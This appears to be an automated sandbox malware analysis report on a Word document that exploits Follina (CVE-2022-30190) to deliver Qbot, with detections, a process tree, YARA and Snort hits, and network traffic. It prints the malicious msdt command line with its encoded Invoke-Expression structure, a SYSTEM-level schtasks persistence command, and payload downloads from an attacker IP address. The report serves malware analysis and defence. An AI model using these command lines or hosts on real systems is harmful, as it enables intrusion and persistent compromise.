Windows Analysis Report
doc782.docx

Overview

General Information

Sample Name: doc782.docx
Analysis ID: 640940
MD5: e7015438268464cedad98b1544d643ad
SHA1: 03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256: d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93

Detection

CryptOne, Follina CVE-2022-30190, Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Sigma detected: Schedule system process
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 7032 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5960 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • MSOSYNC.EXE (PID: 5160 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 2984 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 4480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 1124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 4384 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 4536 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 1320 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 4384 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • regsvr32.exe (PID: 5688 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 2256 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • schtasks.exe (PID: 4456 cmdline: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • regsvr32.exe (PID: 4768 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 5492 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • csc.exe (PID: 5404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 4496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 6036 cmdline: regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 3976 cmdline: -s "C:\Users\user\AppData\Local\Temp\t1.A" MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup
{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard | 0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard | 0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard | 0x1447:$re1: location.href = "ms-msdt:

Source | Rule | Description | Author | Strings
0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

Source | Rule | Description | Author | Strings
27.2.regsvr32.exe.4990000.3.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
27.2.regsvr32.exe.43f0000.1.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
29.2.regsvr32.exe.4ad0000.2.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
27.2.regsvr32.exe.43c0184.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
28.2.regsvr32.exe.810184.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

Persistence and Installation Behavior

Source: Process started Author: Joe Security: Data: Command: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, CommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2256, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, ProcessId: 4456, ProcessName: schtasks.exe

Timestamp: 06/07/22-19:44:37.058628
Source IP: 185.234.247.119
Destination IP: 192.168.2.22
SID: 2036726
Source Port: 80
Destination Port: 49171
Protocol: TCP
Classtype: Attempted User Privilege Gain

AV Detection

Source: doc782.docx Virustotal: Detection: 28%
Source: doc782.docx ReversingLabs: Detection: 17%
Source: 32.2.explorer.exe.2f80000.0.unpack Malware Configuration Extractor: Qbot {"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694"}

Exploits

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_0499BCFC FindFirstFileW,FindNextFileW, 27_2_0499BCFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_042ABCFC FindFirstFileW,FindNextFileW, 28_2_042ABCFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04AFBCFC FindFirstFileW,FindNextFileW, 29_2_04AFBCFC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 32_2_02F8BCFC FindFirstFileW,FindNextFileW, 32_2_02F8BCFC

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic TCP traffic: 192.168.2.5:49744 -> 185.234.247.119:80
Source: global traffic TCP traffic: 192.168.2.5:49763 -> 185.234.247.119:80

Networking

Source: Traffic Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.22:49171
Source: Joe Sandbox View ASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jun 2022 17:51:26 GMT Content-Type: application/octet-stream Content-Length: 1437696 Connection: keep-alive Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment;
Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: 185.234.247.119 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: 185.234.247.119 If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT If-None-Match: "6299dd5d-1861" Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /972639944.dat HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: 185.234.247.119 Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: ~WRS{677538CC-22A1-43D9-BD9A-C629280F1C4E}.tmp.0.dr String found in binary or memory: http://185.234.247.119:80/123.RES
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: msdt.exe, 00000007.00000002.713967957.0000000005990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/http
Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: regsvr32.exe, 0000001C.00000002.672872094.0000000000867000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.borland.com/namespaces/Types
Source: regsvr32.exe, 00000026.00000002.713602734.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.borland.com/namespaces/Types-IWSDLPublish
Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.borland.com/namespaces/TypesU
Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
                            Source: regsvr32.exe, 0000001B.00000002.672627187.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesp
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.aadrm.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.aadrm.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.office.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.onedrive.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://apis.live.net/v5.0/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com/v2
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.entity.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cortana.ai/api
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cr.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev.cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://devnull.onenote.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://directory.services.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
